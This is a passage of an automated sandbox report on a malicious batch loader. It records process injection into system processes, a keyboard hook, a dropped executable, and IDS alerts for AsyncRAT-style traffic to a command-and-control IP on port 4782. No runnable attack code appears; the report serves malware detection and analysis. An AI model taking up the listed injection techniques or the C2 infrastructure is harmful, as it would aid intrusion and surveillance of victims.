Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1ED894 FindFirstFileExW,	8_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D21D894 FindFirstFileExW,	8_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D29DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D29D894 FindFirstFileExW,	8_2_000001CA7D29D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD5D894 FindFirstFileExW,	9_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD8D894 FindFirstFileExW,	9_2_0000017D2DD8D894
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B92D894 FindFirstFileExW,	12_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000262F1C9DA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C9D894 FindFirstFileExW,	14_2_00000262F1C9D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D0D894 FindFirstFileExW,	14_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_00000262F1DFDA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DFD894 FindFirstFileExW,	14_2_00000262F1DFD894
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001C115C7DA18
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C7D894 FindFirstFileExW,	15_2_000001C115C7D894
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_000001C115CADA18
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CAD894 FindFirstFileExW,	15_2_000001C115CAD894
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	16_2_000001BB497FDA18
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497FD894 FindFirstFileExW,	16_2_000001BB497FD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B1D894 FindFirstFileExW,	19_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E13D894 FindFirstFileExW,	20_2_000002234E13D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E13DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E16D894 FindFirstFileExW,	20_2_000002234E16D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E16DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056DD894 FindFirstFileExW,	21_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF0570D894 FindFirstFileExW,	21_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD7D894 FindFirstFileExW,	22_2_000002287AD7D894
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_000002287AD7DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA9D894 FindFirstFileExW,	23_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	23_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000002520257DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	24_2_000002520257DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000002520257D894 FindFirstFileExW,	24_2_000002520257D894
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	24_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025AD894 FindFirstFileExW,	24_2_00000252025AD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFCD894 FindFirstFileExW,	25_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC68D894 FindFirstFileExW,	25_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	25_2_000001A9EC68DA18

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 135.125.21.87:4782 -> 192.168.2.7:49816

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: ipwho.is

Source: global traffic

TCP traffic: 192.168.2.7:49816 -> 135.125.21.87:4782

Source: Joe Sandbox View

ASN Name: AVAYAUS AVAYAUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: C:\Windows\System32\svchost.exe

DNS query: name: ipwho.is

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	TCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ipwho.is

Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 00000014.00000002.2863482747.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000009.00000000.1498792506.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498548674.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000002F.00000000.1743050466.000002C939E2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1743200376.000002C939E52000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1743397090.000002C939E84000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000009.00000002.2781167454.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498848284.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000009.00000000.1498548674.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2772012264.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2860002740.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1583032983.000002234AEF1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582220409.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582396161.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.35.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000014.00000000.1582773647.000002234AEAD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.20.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 00000014.00000000.1583626669.000002234B506000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1583032983.000002234AEF1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582220409.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2861654751.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582396161.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582299573.000002234AE34000.00000004.00000001.00020000.00000000.sdmp, FB0D848F74F70BB2EAA93746D24D97490.20.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab
Source: svchost.exe, 00000014.00000000.1583032983.000002234AEF1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?645b70e1261b8
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000014.00000000.1583032983.000002234AEE6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uN
Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000009.00000000.1498792506.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498548674.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000009.00000000.1498378085.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498792506.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498548674.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000000E.00000002.2878845130.00000262ED790000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://osoft.co_2010-06X
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp, Null.6.dr	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xG
Source: svchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1739512168.000002AE14142000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2843841020.000002AE14142000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comSRD1%
Source: svchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comcom
Source: svchost.exe, 0000002D.00000000.1738511200.000002AE14044000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comSRD1-
Source: svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835872307.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comSRD13
Source: svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comSRD1#

Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828

Source: unknown

HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.7:49828 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found large BAT file

Source: Hydra.ccLoader.bat

Static file information: 7306960

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\$nya-onimai2\MzWhoQ.exe

Jump to dropped file

Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	7_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	8_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW,	9_2_0000017D2DD52300
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD527E8 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	9_2_0000017D2DD527E8
